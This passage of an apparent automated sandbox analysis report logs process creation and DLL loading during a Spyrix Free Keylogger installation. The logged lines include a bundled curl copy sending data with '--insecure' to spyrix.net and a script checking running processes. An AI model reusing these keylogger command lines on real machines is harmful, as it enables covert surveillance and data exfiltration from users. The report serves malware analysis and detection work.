Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,17144999493896228581,15445594864361974383,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
